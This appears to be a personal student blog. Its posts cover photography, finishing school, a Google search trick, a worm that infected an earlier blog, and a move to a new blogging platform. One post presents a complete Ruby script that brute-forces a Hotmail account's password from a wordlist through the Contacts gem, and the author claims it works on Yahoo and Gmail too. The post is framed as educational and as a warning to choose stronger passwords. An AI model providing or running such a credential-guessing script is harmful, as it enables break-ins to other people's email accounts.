Hey guys. Been such a long time again since i have written something here. About life? it's great here, As college has started couple of days back and it's awesome. Apart from going to college i have been doing some photography these days too. Catching a bit of the lightning here and there and going out to the beach to capture some sky and the sand. It may not be as pleasing as the beaches in our country but still it's worth the shots for photography's sake.
Being unable to settle down completely, I have a lot of places to go and shoot, and to explore. Specially the thunderstorms here are quite spectacular and worth getting out with the tripod and camera. I got a good shot of a lightning strike and you can find it here if you are curious to check it out. Anyways i will be quite busy in the upcoming days as i will be going to 2 courses. And check out my photostream too.

I was searching the internet for cool ASCII art until i came up with this on google. It is a google search trick which changes it's logo on the top left side in the search results page.
Type in "ascii art" and hit enter. To check it out. Remember, It doesn't work when typed in "ASCII art" instead of "ascii art". Here is how it looks like

Ask me if i am excited, because i surely am today. 13 years of schooling is finally over. Mixed feelings linger in my head today, as i will miss the school moments so much. The fun we had over there and the precious moments with friends, will definitely miss them, And not to leave out my well-wishing teachers, Who were so nice to me. Specially this year's teachers. Will not forget them for sure. But this is what life is all about. Some new challenges are put up right infront of me. Will overcome any obstacles which may arise infront of me. Atleast i will try my best.
I am also about to leave the island, and move out in 4 days. So this is also going to be big, As i have never been out of my mother country before and will surely be a new experience for me. And in addition to that, as some of my buddies from this island are staying there for higher studies, meeting them there will be so much fun.
Will keep you all updated as much as possible. Just remember to stick with this blog, which i will be updating. Not regularly but in events of success and adventure. keep in touch mates.

hey dudes. Today i am going to share a code snippet i worked on couple of days ago. Originally the idea of this script was given by Nuvana.Her hubby recovered her lost password when she forgot it. So i wanted to get my hands dirty with some ruby code, and wanted to try out this one. Actually i succeeded.
The program is written in ruby so you need ruby interpreter to execute this, and the Contacts gem is needed as well. However performing attacks like this on people's accounts is not sensible and takes a lot of time. It is even not worth the time spent on cracking because there is only 20-30 percent chance of actually getting others passwords.
This program is written for educational purposes only and to let you all know that, these kinds of attacks exist and your account can be hacked. So i request you all to change your passwords to alpha-numeric for atleast a bare minimum. here is the code
#!D:\Ruby\bin\ruby
require "contacts"
# This program will have benchmarking
# set initial counter
i = Time.now
# Set initial wordlist
passes = Array.new
file = File.open('words.txt','r')
file.each_line do |w|
passes << w
end
# start the bruteforce attack with the provided wordlist
for $w in passes do
begin
contacts = Contacts::Hotmail.new(ARGV[0], $w).contacts
puts "PWNED!! The password is #{$w}"
break
rescue Contacts::AuthenticationError
puts "#{$w} as a password didn't work!"
end
end
# output the time it took to execute the whole script
puts "It took #{Time.now - i} seconds to execute the whole attack!"
As you can see, cracking the passwords rely on the quality of the wordlist being used. This can be done to hotmail, yahoo and gmail passwords as well. The id must be passed as the first argument to the program in order to crack his/her password.

This is the place where i am going to be writing about my life and my daily encounters which i have to share with the world. What happend to my wordpress blog was, it got infected with the worm that has been spreading recently called "Cornficker". The actual meaning is offensive so i am not going to write it here. You can read about it in the wiki page here. The worm only affects users who are using the buggy windows, and for that fact i got infected.
I have some more stuff to share with you all, but as this time is my GCE O level exams, i will keep the noise level a little low. After the exams will rock this place with code snippets, tips and tricks and yes, my daily life encounters.
Wish me luck for my final exams. I will need it. :)

Hello everyone,
It has been such a long time since i haven't updated my blog, my previous blog is gone. its because of many reasons. one of the main reasons is that i screwed it up. forgot to take backup while doing some repairs on the blog, and i didnt have a backup copy of earlier time too. And the main reason i switched to posterous is i wanted simplicity. as i am a hardcore believer of the words "from simplicity comes creativity" that will be true in the modern web 2.0 world.
i have developed and designed my personal homepage too. it is the second design i did. when i did the first one didn't get a good positive comment. it was like "think out of the box dude" so i changed the blog layout and designs and simplified the theme. removed the images and all, but still it looks better than the last one i think.
this will be the place where i will be updating my status and the good thing about this is i will be able to update on the move. i will be posting about web designing, tips and tricks and some personal stuff's too. so stay tuned.
